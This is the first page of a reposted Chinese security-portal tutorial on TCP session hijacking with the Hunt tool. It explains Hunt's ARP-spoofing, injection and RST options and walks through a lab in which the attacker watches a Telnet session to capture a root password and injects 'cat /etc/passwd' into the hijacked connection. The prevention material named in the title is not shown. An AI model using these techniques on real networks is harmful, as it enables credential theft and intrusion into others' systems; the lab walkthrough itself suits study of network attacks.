热点推荐
ZOL首页 > 企业安全 > 安全 > 攻防在线 > 会话劫持实例演示与防范技巧全攻略

会话劫持实例演示与防范技巧全攻略


doit 【转载】 2010年09月13日 09:56 评论

  要知道很多工具都可以进行会话劫持,比如说相对常用的juggernaut、TTY Watcher,还有如Dsniff这样的工具包也可以实现会话劫持。但是本此的会话劫持实例演示还是通过经典工具Hunt来进行。Hunt可以说是功能非常强大,并且可以把会话劫持技术发挥得淋漓尽致。

  本次会话劫持实例演示所使用的Hunt是1.5,可以到Pavel Krauz网站下载源代码包和二进制文件:

  lin.fsid.cvut.cz/~kra/#hunt。

  现在来看看如果使用Hunt,首先是下载并编译源代码:

  [root@dahubaobao hunt]#wget

  [root@dahubaobao>www.ringz.org/hunt-1.5.tgz

  [root@dahubaobao hunt]#tar zxvf hunt-1.5.tgz

  [root@dahubaobao hunt]#cd hunt-1.5

  [root@dahubaobao hunt-1.5]#make

  [root@dahubaobao hunt-1.5]#./hunt

  //Hunt是完全交互试的操作

  解释一下各个选项的含义

  l/w/r) list/watch/reset connections

  //l(字母l)为查看当前网络上的会话;w为监视当前网络上的某个会话;r为重置当前网络上的某个会话。

  a) arp/simple hijack (avoids ack storm if arp used)

  //中间人攻击(会话劫持),Hunt先进行ARP欺骗,然后进行会话劫持。使用此方法可以避免出现ACK风暴。

  s) simple hijack

  //简单的会话劫持,也就是注射式攻击。会出现ACK风暴。

  d) daemons rst/arp/sniff/mac

  //该选项共实现四个功能,分别为:终止会话,自动发送带RST标志位的TCP包;ARP欺骗后进行数据包转发;不用说了,嗅探功能;在当前网络上收集MAC地址。

  其他的选项很简单,不在多说了。还是来看看具体的例子吧,我想大家都等不及了!^_^

  应用实例

  测试环境:

  攻击者:Red Hat Linux 9.0 IP:192.168.0.10

  主机A:Windows Advanced Server IP:192.168.0.1

  主机B:FreeBSD 4.9 STABLE IP:192.168.0.20

  [root@dahubaobao hunt-1.5]#./hunt

  /*

  * hunt 1.5

  * multipurpose connection intruder / sniffer for Linux

  * (c) 1998-2000 by kra

  */

  starting hunt

  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

  l/w/r) list/watch/reset connections

  u) host up tests

  a) arp/simple hijack (avoids ack storm if arp used)

  s) simple hijack

  d) daemons rst/arp/sniff/mac

  o) options

  x) exit

  *> l //查看当前网络上的会话

  0)192.168.0.1 [3465] ?192.168.0.20 [23]

  //主机A正在Telnet到主机B

  --- Main Menu --- rcvpkt 0, fr

  ee/alloc 63/64 ------

  l/w/r) list/watch/reset connections

  u) host up tests

  a) arp/simple hijack (avoids ack storm if arp used)

  s) simple hijack

  d) daemons rst/arp/sniff/mac

  o) options

  x) exit

  *> w //监视当前网络上的会话

  0)192.168.0.1 [3465] ?192.168.0.20 [23]

  Choose conn>0 //选择打算监视的会话。由于我的条件有限,不能模拟多个会话,请多见量。

  Dump [s]rc/[d]st/[b]oth [b]> //回车

  Print sec/dst same charactes y/n [n]> //回车 现在就可以监视会话了。主机A输入的一切内容,我们都可以看到。主机A在Telnet并登陆之后,直接su root,password:后边的就是root的密码。现在这个系统已经完全由你所控制了,自由发挥吧!

  --- Main Menu --- rcvpkt 0, free/alloc 63/64 ------

  l/w/r) list/watch/reset connections

  u) host up tests

  a) arp/simple hijack (avoids ack storm if arp used)

  s) simple hijack

  d) daemons rst/arp/sniff/mac

  o) options

  x) exit

  *> s //进行注射式会话劫持

  0)192.168.0.1 [3465] ?192.168.0.20 [23]

  choose conn> 0

  dump connection y/n [n]>

  Enter the command string you wish executed or [cr]> cat /etc/passwd

1 2 下一页
本文导航
  • 第1页:会话劫持实例演示与防范技巧全攻略
频道热词:云计算  服务器   无线路由器  
视觉焦点
企业安全安全热点
排行 文章标题
TOP10周热门硬盘录像机排行榜
  • 热门
  • 新品
查看完整榜单>>